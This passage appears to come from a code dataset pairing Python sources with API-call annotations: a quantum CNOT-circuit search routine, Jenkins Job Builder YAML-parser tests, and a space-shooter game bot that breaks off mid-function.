            # Mutate one layer of the current seed circuit.
            cnot_layers = cnot_seed.copy()
            cnot_layers[i] = RandomCNOT(quantum_count)
            sc, model = solver(cnot_layers)
            # Accept improvements always; accept worse candidates with a
            # probability that decays as the epoch counter grows.
            if sc > best_score or np.random.randint(epochs) > epoch:
                cnot_seed = cnot_layers
            if sc > best_score:
                best_score = sc
                best_model = model
                best_cnot = cnot_layers
                if save_path is not None and best_score > global_best_score:
                    with open(save_path, 'w') as f:
                        f.write(best_model)
            print('epoch %d, iter %d, Score = %g, best_score = %g, global_best_score = %g, time = %gs'%(epoch, i, sc, best_score, global_best_score, time.time()-start_time))
            # print(best_model)
    return best_score, best_model, best_cnot
def SequenceJitter(quantum_count, layer_count, solver, init_epochs=10, epochs=100, save_path=None, global_best_score=0):
    """
    Greedy local search: pick the best of several random seeds, then jitter
    one layer at a time, keeping only strict improvements.

    Args:
        quantum_count: number of qubits per CNOT layer.
        layer_count: number of CNOT layers in the circuit.
        solver: callable taking a CNOT structure and returning (score, model).
        init_epochs: number of random seeds to try before jittering.
        epochs: number of jitter rounds.
        save_path: optional path where the best model is written.
        global_best_score: only save models scoring above this threshold.

    Returns:
        (best_score, best_model, best_cnot)
    """
    best_score = None
    print('Init cnot seed.')
    for _ in tqdm(range(init_epochs)):
        cnot = RandomCNOTs(quantum_count, layer_count)
        sc, model = solver(cnot)
        # Take the first sample unconditionally so cnot_seed / best_model are
        # always bound (previously a NameError if no init score exceeded 0).
        if best_score is None or sc > best_score:
            best_score = sc
            cnot_seed = cnot
            best_model = model
            best_cnot = cnot
            if save_path is not None and best_score > global_best_score:
                with open(save_path, 'w') as f:
                    f.write(best_model)
    start_time = time.time()
    for epoch in range(epochs):
        for i in range(layer_count):
            # Mutate one layer; keep the change only on strict improvement.
            cnot_layers = cnot_seed.copy()
            cnot_layers[i] = RandomCNOT(quantum_count)
            sc, model = solver(cnot_layers)
            if sc > best_score:
                best_score = sc
                cnot_seed = cnot_layers
                best_model = model
                best_cnot = cnot_layers
                if save_path is not None and best_score > global_best_score:
                    with open(save_path, 'w') as f:
                        f.write(best_model)
            print('Score = %g, best_score = %g, global_best_score = %g, time = %gs'%(sc, best_score, global_best_score, time.time()-start_time))
            # print(best_model)
    return best_score, best_model, best_cnot
def RandomSearch(cnot_creater, solver, epochs=100, save_path=None):
    '''
    Random search over network structures.

    Parameters:
        cnot_creater: callable that generates a CNOT layer layout
        solver: callable that, given a network structure, fits the network
            parameters and returns ``(score, model)``
        epochs: number of random-search rounds
        save_path: if given, the best model is written there each time the
            best score improves
    Returns:
        (best_score, best_model); ``best_model`` is None when no round ever
        produced a score above 0.
    '''
    best_score = 0
    # Pre-initialize so a run where no score beats 0 returns (0, None)
    # instead of raising UnboundLocalError at the final return.
    best_model = None
    start_time = time.time()
    for epoch in range(epochs):
        cnot_layers = cnot_creater()
        sc, model = solver(cnot_layers)
        if sc > best_score:
            best_score = sc
            best_model = model
            if save_path is not None:
                with open(save_path, 'w') as f:
                    f.write(best_model)
        print('No_%d: score = %g, best_score = %g, time = %gs'%(epoch, sc, best_score, time.time()-start_time))
    return best_score, best_model
| [
"utils.RandomCNOTs",
"numpy.random.randint",
"time.time",
"utils.RandomCNOT"
] | [((247, 286), 'utils.RandomCNOTs', 'RandomCNOTs', (['quantum_count', 'layer_count'], {}), '(quantum_count, layer_count)\n', (258, 286), False, 'from utils import RandomCNOT, RandomCNOTs\n'), ((591, 602), 'time.time', 'time.time', ([], {}), '()\n', (600, 602), False, 'import time\n'), ((2114, 2125), 'time.time', 'time.time', ([], {}), '()\n', (2123, 2125), False, 'import time\n'), ((3177, 3188), 'time.time', 'time.time', ([], {}), '()\n', (3186, 3188), False, 'import time\n'), ((1734, 1773), 'utils.RandomCNOTs', 'RandomCNOTs', (['quantum_count', 'layer_count'], {}), '(quantum_count, layer_count)\n', (1745, 1773), False, 'from utils import RandomCNOT, RandomCNOTs\n'), ((744, 769), 'utils.RandomCNOT', 'RandomCNOT', (['quantum_count'], {}), '(quantum_count)\n', (754, 769), False, 'from utils import RandomCNOT, RandomCNOTs\n'), ((2267, 2292), 'utils.RandomCNOT', 'RandomCNOT', (['quantum_count'], {}), '(quantum_count)\n', (2277, 2292), False, 'from utils import RandomCNOT, RandomCNOTs\n'), ((846, 871), 'numpy.random.randint', 'np.random.randint', (['epochs'], {}), '(epochs)\n', (863, 871), True, 'import numpy as np\n'), ((3596, 3607), 'time.time', 'time.time', ([], {}), '()\n', (3605, 3607), False, 'import time\n'), ((1404, 1415), 'time.time', 'time.time', ([], {}), '()\n', (1413, 1415), False, 'import time\n'), ((2805, 2816), 'time.time', 'time.time', ([], {}), '()\n', (2814, 2816), False, 'import time\n')] |
#!/usr/bin/env python
#
# Copyright 2013 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import yaml
from testtools import ExpectedException
from yaml.composer import ComposerError
from jenkins_jobs.config import JJBConfig
from jenkins_jobs.parser import YamlParser
from tests import base
def _exclude_scenarios(input_filename):
    # Fixtures whose file name carries the "custom_" prefix are driven by
    # dedicated test methods instead of the generated scenario tests.
    base_name = os.path.basename(input_filename)
    return base_name.startswith("custom_")
class TestCaseLocalYamlInclude(base.JsonTestCase):
    """Exercise the application-specific YAML tags in isolation from any
    changes to the modules' XML parsing behaviour."""

    fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
    scenarios = base.get_scenarios(
        fixtures_path, "yaml", "json", filter_func=_exclude_scenarios
    )

    def test_yaml_snippet(self):
        run_parent = super(TestCaseLocalYamlInclude, self).test_yaml_snippet
        triggers_error = os.path.basename(self.in_filename).startswith("exception_")
        if not triggers_error:
            run_parent()
        else:
            # Fixtures prefixed "exception_" must raise a duplicate-anchor error.
            with ExpectedException(ComposerError, "^found duplicate anchor .*"):
                run_parent()
class TestCaseLocalYamlAnchorAlias(base.YamlTestCase):
    """Check that YAML anchors and aliases in the input are expanded into
    the expected output YAML."""

    fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")
    scenarios = base.get_scenarios(
        fixtures_path, "iyaml", "oyaml"
    )
class TestCaseLocalYamlIncludeAnchors(base.BaseTestCase):
    fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")

    def test_multiple_same_anchor_in_multiple_toplevel_yaml(self):
        """Anchors/aliases must only span use of the '!include' tag.

        YAML pulled in through the include tag shares the namespace of the
        top-level file that included it, while separate top-level YAML
        documents are loaded independently of each other.
        """
        part_files = (
            "custom_same_anchor-001-part1.yaml",
            "custom_same_anchor-001-part2.yaml",
        )
        jjb_config = JJBConfig()
        jjb_config.jenkins["url"] = "http://example.com"
        jjb_config.jenkins["user"] = "jenkins"
        jjb_config.jenkins["password"] = "password"
        jjb_config.builder["plugins_info"] = []
        jjb_config.validate()
        parser = YamlParser(jjb_config)
        paths = [os.path.join(self.fixtures_path, name) for name in part_files]
        parser.load_files(paths)
class TestCaseLocalYamlRetainAnchors(base.BaseTestCase):
    fixtures_path = os.path.join(os.path.dirname(__file__), "fixtures")

    def _fixture_files(self):
        # Both tests below load the same fixture pair, in the same order.
        return [
            os.path.join(self.fixtures_path, name)
            for name in (
                "custom_retain_anchors_include001.yaml",
                "custom_retain_anchors.yaml",
            )
        ]

    def test_retain_anchors_default(self):
        """Anchors must NOT survive across files with the default settings."""
        jjb_config = JJBConfig()
        # retain_anchors is deliberately left at its default (disabled).
        jjb_config.validate()
        parser = YamlParser(jjb_config)
        with ExpectedException(yaml.composer.ComposerError, "found undefined alias.*"):
            parser.load_files(self._fixture_files())

    def test_retain_anchors_enabled(self):
        """Anchors carry over between files when retain_anchors is enabled
        in the config."""
        jjb_config = JJBConfig()
        jjb_config.yamlparser["retain_anchors"] = True
        jjb_config.validate()
        parser = YamlParser(jjb_config)
        parser.load_files(self._fixture_files())
| [
"testtools.ExpectedException",
"os.path.join",
"os.path.dirname",
"os.path.basename",
"jenkins_jobs.config.JJBConfig",
"jenkins_jobs.parser.YamlParser",
"tests.base.get_scenarios"
] | [((1172, 1258), 'tests.base.get_scenarios', 'base.get_scenarios', (['fixtures_path', '"""yaml"""', '"""json"""'], {'filter_func': '_exclude_scenarios'}), "(fixtures_path, 'yaml', 'json', filter_func=\n _exclude_scenarios)\n", (1190, 1258), False, 'from tests import base\n'), ((1879, 1930), 'tests.base.get_scenarios', 'base.get_scenarios', (['fixtures_path', '"""iyaml"""', '"""oyaml"""'], {}), "(fixtures_path, 'iyaml', 'oyaml')\n", (1897, 1930), False, 'from tests import base\n'), ((1117, 1142), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1132, 1142), False, 'import os\n'), ((1824, 1849), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1839, 1849), False, 'import os\n'), ((2025, 2050), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (2040, 2050), False, 'import os\n'), ((2581, 2592), 'jenkins_jobs.config.JJBConfig', 'JJBConfig', ([], {}), '()\n', (2590, 2592), False, 'from jenkins_jobs.config import JJBConfig\n'), ((2839, 2861), 'jenkins_jobs.parser.YamlParser', 'YamlParser', (['jjb_config'], {}), '(jjb_config)\n', (2849, 2861), False, 'from jenkins_jobs.parser import YamlParser\n'), ((3030, 3055), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (3045, 3055), False, 'import os\n'), ((3318, 3329), 'jenkins_jobs.config.JJBConfig', 'JJBConfig', ([], {}), '()\n', (3327, 3329), False, 'from jenkins_jobs.config import JJBConfig\n'), ((3423, 3445), 'jenkins_jobs.parser.YamlParser', 'YamlParser', (['jjb_config'], {}), '(jjb_config)\n', (3433, 3445), False, 'from jenkins_jobs.parser import YamlParser\n'), ((3898, 3909), 'jenkins_jobs.config.JJBConfig', 'JJBConfig', ([], {}), '()\n', (3907, 3909), False, 'from jenkins_jobs.config import JJBConfig\n'), ((4007, 4029), 'jenkins_jobs.parser.YamlParser', 'YamlParser', (['jjb_config'], {}), '(jjb_config)\n', (4017, 4029), False, 'from jenkins_jobs.parser import YamlParser\n'), ((856, 888), 'os.path.basename', 
'os.path.basename', (['input_filename'], {}), '(input_filename)\n', (872, 888), False, 'import os\n'), ((3459, 3532), 'testtools.ExpectedException', 'ExpectedException', (['yaml.composer.ComposerError', '"""found undefined alias.*"""'], {}), "(yaml.composer.ComposerError, 'found undefined alias.*')\n", (3476, 3532), False, 'from testtools import ExpectedException\n'), ((1314, 1348), 'os.path.basename', 'os.path.basename', (['self.in_filename'], {}), '(self.in_filename)\n', (1330, 1348), False, 'import os\n'), ((1392, 1454), 'testtools.ExpectedException', 'ExpectedException', (['ComposerError', '"""^found duplicate anchor .*"""'], {}), "(ComposerError, '^found duplicate anchor .*')\n", (1409, 1454), False, 'from testtools import ExpectedException\n'), ((2884, 2919), 'os.path.join', 'os.path.join', (['self.fixtures_path', 'f'], {}), '(self.fixtures_path, f)\n', (2896, 2919), False, 'import os\n'), ((4052, 4087), 'os.path.join', 'os.path.join', (['self.fixtures_path', 'f'], {}), '(self.fixtures_path, f)\n', (4064, 4087), False, 'import os\n'), ((3560, 3595), 'os.path.join', 'os.path.join', (['self.fixtures_path', 'f'], {}), '(self.fixtures_path, f)\n', (3572, 3595), False, 'import os\n')] |
from bot_interface import *
import math
class SeijiBot(BotBase):
    """Combat bot: avoids rocks and lasers, tracks the nearest enemy ship
    and fires predictively.

    Controls are expressed as one main-thruster value plus two side-thruster
    values; rotation is produced by driving the side thrusters in opposite
    directions.
    """
    def __init__(self):
        # Real setup happens lazily in initialize(), which needs a gamestate.
        self.initialized = False
    def initialize(self, gamestate):
        """One-time setup on the first process() call: cache uid, timestep
        and the ship's physical constants."""
        gamestate.log("Initializing...")
        #Getting UID
        self.uid = gamestate.bot.uid
        gamestate.log("This ship has uid " + str(self.uid))
        #Getting time step
        self.step = gamestate.timestep
        gamestate.log("Initialized with timestep of " + str(self.step) + "s")
        gamestate.log("Ships have a " + str(gamestate.ships[self.uid].radius) + "m radius")
        #Setting Global constants
        self.mass = 1
        self.main_thrust = 30
        self.side_thrust = 15
        self.side_thrust_offset = 2
        self.laser_charge_time = .5
        self.initialized = True
    #From here are some useful functions
    #Side functions
    def solveQuad(self, a, b, c):
        """Solve a*x**2 + b*x + c = 0.

        Returns the two real roots as a tuple (equal roots repeated), or
        None when a == 0 or the discriminant is negative.
        """
        if a == 0:
            return None
        delta = b**2 - 4*a*c
        if delta < 0:
            return None
        if delta == 0:
            return (-b)/(2*a), (-b)/(2*a)
        delta = math.sqrt(delta)
        return (((-b)-delta)/(2*a), ((-b)+delta)/(2*a))
    def dist(self, obj1, obj2):
        """Euclidean distance between two objects exposing posx/posy."""
        return math.sqrt((obj1.posx - obj2.posx)**2 + (obj1.posy - obj2.posy)**2)
    def toRad(self, angle):
        """Convert degrees to radians."""
        return (float(angle)/180)*math.pi
    def sign(self, n):
        """Return 0 for n == 0, otherwise n/abs(n) (i.e. +/-1)."""
        if n == 0:
            return 0
        return n/abs(n)
    def fmod(self, n, k):
        """Floored modulo: n - k*floor(n/k), result takes the sign of k."""
        d = math.floor(n/k)
        return n - k*d
    def glob_loc(self, x1, y1, angle, x2, y2):
        """Map the global point (x2, y2) into the local frame anchored at
        (x1, y1) and rotated by `angle` (radians)."""
        rx, ry = x2 - x1, y2 - y1
        tx, ty = math.cos(-angle) * rx - math.sin(-angle) * ry, math.cos(-angle) * ry + math.sin(-angle) * rx
        return tx, ty
    def normalize(self, vec):
        """Return vec scaled to unit length; a zero vector is returned as-is."""
        sqrl = 0
        for i in vec:
            sqrl += i**2
        l = math.sqrt(sqrl)
        if l == 0.0:
            return vec
        res = []
        for i in vec:
            res.append(i/l)
        return res
    def invert(self, vec):
        """Component-wise negation of a vector."""
        return [-i for i in vec]
    #Movement functions
    #Change angular speed - It doesn't change linear velocity
    #Returns -> thruster value
    def angularSpeed(self, ship, final_speed):
        """Proportional controller output driving velang toward final_speed,
        clamped to [-1, 1]."""
        k = .1
        vel = self.toRad(ship.velang)
        delta = final_speed - vel
        ret = delta*k
        if ret > 1:
            ret = 1
        elif ret < -1:
            ret = -1
        return -ret
    def angDelta(self, ship, angle):
        """Shortest signed angular difference (radians, in [-pi, pi]) from
        the ship's current heading to `angle`."""
        delta = self.fmod(angle + 2*math.pi, 2*math.pi) - self.fmod(self.fmod(self.toRad(ship.ang), 2*math.pi) + 2*math.pi, 2*math.pi)
        if abs(delta) > math.pi:
            delta = (2*math.pi - abs(delta))*self.sign(-delta)
        return delta
    #Control ship rotation to certain angle - It doesn't change linear velocity
    #Returns -> thruster value
    def lookAt(self, ship, final_ang):
        """PD controller output that rotates the ship toward final_ang,
        clamped to [-1, 1]."""
        kP, kD = .6, 3.5
        out = -kP*self.angDelta(ship, final_ang) + kD*self.toRad(ship.velang)*self.step
        if out > 1:
            out = 1
        elif out < -1:
            out = -1
        return out
    #Accelerate ship towards certain coordinate - It doesn't change velang
    #Returns -> main thruster value, frontal thruster value, back thruster value
    def accelerateTo(self, ship, towx, towy, pot = 1):
        """Thruster triple [main, front, back] pushing toward (towx, towy),
        scaled by `pot`."""
        # NOTE(review): tstep and fmax are computed but never used below.
        tstep = self.step
        fmax = self.main_thrust/self.mass
        angles = self.toRad(ship.ang)
        x, y = self.glob_loc(ship.posx, ship.posy, angles, towx, towy)
        res = [0, 0, 0]
        cx, cy = self.normalize([x, y])
        res[0] = -cy*pot
        res[1] = cx*pot
        res[2] = cx*pot
        return res
    #Estimating objects
    def estimateObj(self, obj, time = None):
        """Advance a generic object's position by `time` seconds (defaults
        to one timestep). NOTE: objest aliases obj, so obj is mutated."""
        if time == None:
            time = self.step
        objest = obj
        objest.posx += objest.velx*time
        objest.posy += objest.vely*time
        return objest
    def estimateRock(self, obj, time = None):
        """Advance a rock's position by `time` seconds (aliases and mutates
        obj)."""
        if time == None:
            time = self.step
        objest = obj
        objest.posx += objest.velx*time
        objest.posy += objest.vely*time
        return objest
    def estimateShip(self, obj, time = None):
        """Advance a ship's position and heading by `time` seconds (aliases
        and mutates obj)."""
        if time == None:
            time = self.step
        objest = obj
        objest.posx += objest.velx*time
        objest.posy += objest.vely*time
        objest.ang += objest.velang*time
        return objest
    def estimateLaser(self, obj, time = None):
        """Advance a laser's position and burn down its lifetime by `time`
        seconds (aliases and mutates obj)."""
        if time == None:
            time = self.step
        objest = obj
        objest.posx += objest.velx*time
        objest.posy += objest.vely*time
        objest.lifetime -= time
        return objest
    #Estimating Time of Collision
    #Returns -> Time(seconds) for collision of obj1 and obj2: MIN, MAX
    def toC(self, obj1, obj2, error_margin):
        """Time of collision between two moving circles.

        Solves |p1(t) - p2(t)| = obj1.radius + obj2.radius + error_margin
        analytically; returns the two crossing times (earlier, later), or
        None when the paths never meet (or relative speed is zero).
        """
        A = obj1.posx
        a = obj1.velx
        B = obj2.posx
        b = obj2.velx
        C = obj1.posy
        c = obj1.vely
        D = obj2.posy
        d = obj2.vely
        R = obj1.radius + error_margin/2
        r = obj2.radius + error_margin/2
        Asq = A**2
        asq = a**2
        Bsq = B**2
        bsq = b**2
        Csq = C**2
        csq = c**2
        Dsq = D**2
        dsq = d**2
        Rsq = R**2
        rsq = r**2
        div = asq - 2*a*b + bsq + csq - 2*c*d + dsq
        # Pre-expanded closed-form terms of the quadratic in t
        # (machine-generated expansion; do not edit by hand).
        delta = (-Asq*csq + 2*Asq*c*d - Asq*dsq + 2*A*B*csq - 4*A*B*c*d + 2*A*B*dsq + 2*A*C*a*c - 2*A*C*a*d - 2*A*C*b*c + 2*A*C*b*d - 2*A*D*a*c + 2*A*D*a*d + 2*A*D*b*c - 2*A*D*b*d - Bsq*csq + 2*Bsq*c*d - Bsq*dsq - 2*B*C*a*c + 2*B*C*a*d + 2*B*C*b*c - 2*B*C*b*d + 2*B*D*a*c - 2*B*D*a*d - 2*B*D*b*c + 2*B*D*b*d - Csq*asq + 2*Csq*a*b - Csq*bsq + 2*C*D*asq - 4*C*D*a*b + 2*C*D*bsq - Dsq*asq + 2*Dsq*a*b - Dsq*bsq + Rsq*asq - 2*Rsq*a*b + Rsq*bsq + Rsq*csq - 2*Rsq*c*d + Rsq*dsq + 2*R*asq*r - 4*R*a*b*r + 2*R*bsq*r + 2*R*csq*r - 4*R*c*d*r + 2*R*dsq*r + asq*rsq - 2*a*b*rsq + bsq*rsq + csq*rsq - 2*c*d*rsq + dsq*rsq)
        minusb = (-A*a + A*b + B*a - B*b - C*c + C*d + D*c - D*d)
        if div == 0 or delta < 0:
            return None
        else:
            res0 = (minusb - math.sqrt(delta))/(div)
            res1 = (minusb + math.sqrt(delta))/(div)
            return res0, res1
    #Predictive shooting of moving target
    #Returns -> Time(seconds) for shoot to reach target on line, coordinates x and y for the shoot to be 'centered'
    def predShoot(self, ship, target, speed, gamestate):
        """Lead a shot at a moving target.

        Returns (time_to_impact, (aim_x, aim_y)) for a projectile of the
        given speed, or None when no interception is possible.
        """
        tx = target.posx - ship.posx
        ty = target.posy - ship.posy
        tvx = target.velx - ship.velx
        tvy = target.vely - ship.vely
        a = tvx**2 + tvy**2 - speed**2
        b = 2*(tvx*tx + tvy * ty)
        c = tx**2 + ty**2
        r = self.solveQuad(a, b, c)
        if r == None:
            return None
        else:
            r0, r1 = r
            if r1 < 0 and r0 < 0:
                return None
            elif r0 < 0:
                coords = (target.posx + tvx*r1, target.posy + tvy*r1)
                return r1, coords
            else:
                coords = (target.posx + tvx*r0, target.posy + tvy*r0)
                return r0, coords
    # uid of the enemy ship currently tracked (None until acquired).
    target = None
    # Whether a target has been acquired at least once.
    ok = False
    # Tick of the last process() call.
    ltick = 0
    def process(self, gamestate):
        """Per-tick callback: returns an Action(main, side1, side2, shot).

        Pipeline inside the target branch: predictive shooting at the
        tracked ship, repulsion from rocks/lasers (both proximity- and
        time-of-collision-based), arena-edge avoidance, distance keeping,
        watching enemy headings, and finally an emergency overwrite when a
        collision is imminent.
        """
        if not self.initialized:
            self.initialize(gamestate)
            return Action(0, .1, .1, 0)
        # Probe that the tracked target still exists; on failure, reacquire.
        # NOTE(review): bare except silently swallows any error here.
        try:
            sgargs = gamestate.ships[self.target]
        except:
            self.target = None
            self.ok = False
        if len(gamestate.ships) > 1 and not self.ok:
            for i in gamestate.ships:
                if i is not self.uid:
                    self.ok = True
                    self.target = i
                    gamestate.log("Following ship " + str(i))
                    break
        s_ship = gamestate.ships[self.uid]
        zero = 0
        # out: accumulated [main, front, back] thrust; avoid: soft repulsion
        # terms later folded into out with weight peravd.
        out = [0, 0, 0]
        avoid = [0, 0, 0]
        rotation_out = 0
        rot_mean = 0
        # out_s: shot command (0 = hold fire, 1/2/3 = charge level to fire).
        out_s = 0
        self.ltick = gamestate.tick
        #Targeting and shooting
        # Retarget to the closest enemy ship.
        for ship_uid in gamestate.ships:
            if self.uid == ship_uid:
                continue
            ship = gamestate.ships[ship_uid]
            if self.dist(ship, s_ship) < self.dist(gamestate.ships[self.target], s_ship):
                self.target = ship_uid
        if(self.target is not None):
            targetp = self.estimateShip(gamestate.ships[self.target], self.step)
            shipp = self.estimateShip(s_ship, self.step)
            prediction0 = None
            prediction1 = None
            prediction2 = None
            shoot_type = 0
            min_time = 9999
            # Try the strongest affordable shot first; each speed tier has
            # its own maximum allowed time-to-impact.
            if shipp.charge >= 3:
                predictiont = self.predShoot(shipp, targetp, 75, gamestate)
                if predictiont is not None:
                    time, coords = predictiont
                    time += self.step
                    if time < .8:
                        prediction2 = predictiont
            if shipp.charge >= 2:
                predictiont = self.predShoot(shipp, targetp, 50, gamestate)
                if predictiont is not None:
                    time, coords = predictiont
                    time += self.step
                    if time < .6:
                        prediction1 = predictiont
            if shipp.charge >= 1:
                predictiont = self.predShoot(shipp, targetp, 25, gamestate)
                if predictiont is not None:
                    time, coords = predictiont
                    time += self.step
                    if time < .4:
                        prediction0 = predictiont
            time, coords = None, None
            # Fire only when already pointing close enough (< 0.1 rad) at
            # the lead point; later checks (lower tiers) win out_s.
            if prediction2 is not None:
                time, coords = prediction2
                time += self.step
                if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
                    out_s = 3
            if prediction1 is not None:
                time, coords = prediction1
                time += self.step
                if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
                    out_s = 2
            if prediction0 is not None:
                time, coords = prediction0
                time += self.step
                if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
                    out_s = 1
            if time is not None:
                rotation_out += self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
                rot_mean += 1
            else:
                rotation_out += self.lookAt(shipp, math.atan2(shipp.posx - targetp.posx,targetp.posy - shipp.posy ))
            #Avoidance code
            #Avoid rocks
            rock_repel_r = 15
            rock_repel_t = 5
            rock_less = 9999
            rock_less_uid = None
            for rock_uid in gamestate.rocks:
                rock = gamestate.rocks[rock_uid]
                dist = self.dist(s_ship, rock)
                final = [0, 0, 0]
                # Soft repulsion when simply close to a rock.
                if dist <= rock_repel_r:
                    tmp = self.accelerateTo(s_ship, 2*s_ship.posx - rock.posx, 2*s_ship.posy - rock.posy, math.sqrt((rock_repel_r-dist)/rock_repel_r))
                    avoid[0] += tmp[0]
                    avoid[1] += tmp[1]
                    avoid[2] += tmp[2]
                # Stronger, time-of-collision-based repulsion.
                toc = self.toC(rock, s_ship, .1)
                if not toc == None:
                    if toc[0] > 0:
                        gamestate.log("Rock of uid " + str(rock_uid) + ": Will collide in " + ('%.2f' % toc[0]) + " seconds")
                        shp = self.estimateShip(s_ship, toc[0])
                        rck = self.estimateRock(rock, toc[0])
                        if toc[0] <= rock_repel_t:
                            tmp = self.accelerateTo(shp, 2*shp.posx - rck.posx, 2*shp.posy - rck.posy, math.sqrt((rock_repel_t-toc[0])/rock_repel_t))
                            final[0] += tmp[0]
                            final[1] += tmp[1]
                            final[2] += tmp[2]
                        if rock_less > toc[0]:
                            rock_less = toc[0]
                            rock_less_uid = rock_uid
                out[0] += final[0]
                out[1] += final[1]
                out[2] += final[2]
            #Avoid lasers
            laser_repel_r = 15
            laser_repel_t = 3
            laser_less = 9999
            laser_less_uid = None
            for laser_uid in gamestate.lasers:
                laser = gamestate.lasers[laser_uid]
                dist = self.dist(s_ship, laser)
                final = [0, 0, 0]
                if dist <= laser_repel_r:
                    tmp = self.accelerateTo(s_ship, 2*s_ship.posx - laser.posx, 2*s_ship.posy - laser.posy, math.sqrt((laser_repel_r-dist)/laser_repel_r))
                    avoid[0] += tmp[0]
                    avoid[1] += tmp[1]
                    avoid[2] += tmp[2]
                toc = self.toC(laser, s_ship, .1)
                if not toc == None:
                    if toc[0] > 0:
                        if toc[0] <= laser.lifetime:
                            gamestate.log("Shot of uid " + str(laser_uid) + " from " + str(laser.owner) + ": Will hit in " + ('%.2f' % toc[0]) + " seconds")
                            shp = self.estimateShip(s_ship, toc[0])
                            lsr = self.estimateLaser(laser, toc[0])
                            shipp = self.estimateShip(s_ship, self.step)
                            las = self.estimateLaser(laser, self.step)
                            # Try to shoot the incoming laser down.
                            prediction = self.predShoot(shipp, las, 75, gamestate)
                            if prediction is not None:
                                time, coords = prediction
                                time += self.step
                                gamestate.log(str())
                                if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
                                    out_s = 3
                            prediction = self.predShoot(shipp, las, 50, gamestate)
                            if prediction is not None:
                                time, coords = prediction
                                time += self.step
                                if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
                                    out_s = 2
                            prediction = self.predShoot(shipp, las, 25, gamestate)
                            if prediction is not None:
                                time, coords = prediction
                                time += self.step
                                if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < .1:
                                    out_s = 1
                            if toc[0] <= laser_repel_t:
                                tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-toc[0])/laser_repel_t))
                                final[0] += tmp[0]
                                final[1] += tmp[1]
                                final[2] += tmp[2]
                            if laser_less > toc[0]:
                                laser_less = toc[0]
                                laser_less_uid = laser_uid
                        else:
                            gamestate.log("Shot of uid " + str(laser_uid) + " from " + str(laser.owner) + ": Will not hit. Just " + ('%.2f' % laser.lifetime) + " seconds remaining.")
                out[0] += final[0]
                out[1] += final[1]
                out[2] += final[2]
            #Try not to collide with the arena
            arenac = 1
            if math.sqrt(s_ship.posx**2 + s_ship.posy**2) > gamestate.arenaRadius - 5:
                tmp = self.accelerateTo(s_ship, 0, 0, (math.sqrt(s_ship.posx**2 + s_ship.posy**2) - (gamestate.arenaRadius - 5))/5)
                out[0] += tmp[0]*arenac
                out[1] += tmp[1]*arenac
                out[2] += tmp[2]*arenac
            #Stay at a distance from target
            attrcnt = .3
            if self.target is not None:
                target_r = 30
                dist = self.dist(s_ship, gamestate.ships[self.target])
                linpot = 0
                # NOTE(review): `is not zero` is an identity test against the
                # local int 0 -- equality (!=) was probably intended; confirm.
                if target_r-dist is not zero:
                    linpot = target_r/(dist - target_r)
                tmp = self.accelerateTo(s_ship, gamestate.ships[self.target].posx, gamestate.ships[self.target].posy, (linpot**8)*self.sign(linpot))
                tmp = self.normalize(tmp)
                mx = max(abs(tmp[0]), abs(tmp[1]), abs(tmp[2]))
                if mx != 0:
                    mx = 1/mx
                avoid[0] += tmp[0]*mx*attrcnt
                avoid[1] += tmp[1]*mx*attrcnt
                avoid[2] += tmp[2]*mx*attrcnt
            #Keep track of ship headings/ships targeting self
            predeyesight = .5
            for ship_uid in gamestate.ships:
                if ship_uid is self.uid:
                    continue
                ship = gamestate.ships[ship_uid]
                targetp = self.estimateShip(s_ship, self.step)
                shipp = self.estimateShip(ship, self.step)
                prediction = None
                shoot_type = 0
                # Which shot speeds the enemy could afford, given its charge.
                if shipp.charge < 2 and shipp.charge >= 1:
                    prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
                    prediction1 = None
                    prediction2 = None
                elif shipp.charge < 3:
                    prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
                    prediction1 = self.predShoot(shipp, targetp, 50, gamestate)
                    prediction2 = None
                else:
                    prediction0 = self.predShoot(shipp, targetp, 25, gamestate)
                    prediction1 = self.predShoot(shipp, targetp, 50, gamestate)
                    prediction2 = self.predShoot(shipp, targetp, 75, gamestate)
                if prediction2 is not None:
                    time, coords = prediction2
                    time += self.step
                    # Build a hypothetical laser the enemy could fire now.
                    laser = Laser(0)
                    laser.lifetime = 3
                    laser.owner = ship_uid
                    laser.posx = shipp.posx
                    laser.posy = shipp.posy
                    laser.velx = shipp.velx + 75*math.sin(self.toRad(shipp.ang))
                    # NOTE(review): uses shipp.posy where shipp.vely seems
                    # intended (velx above uses velx) -- same in the two
                    # branches below; confirm.
                    laser.vely = shipp.posy + 75*math.cos(self.toRad(shipp.ang))
                    if abs(self.angDelta(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy))) < 2:
                        if time < 1:
                            shp = self.estimateShip(s_ship, time)
                            lsr = self.estimateLaser(laser, time)
                            tmp = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy, math.sqrt((laser_repel_t-time)/laser_repel_t))
                            avoid[0] += tmp[0]*predeyesight
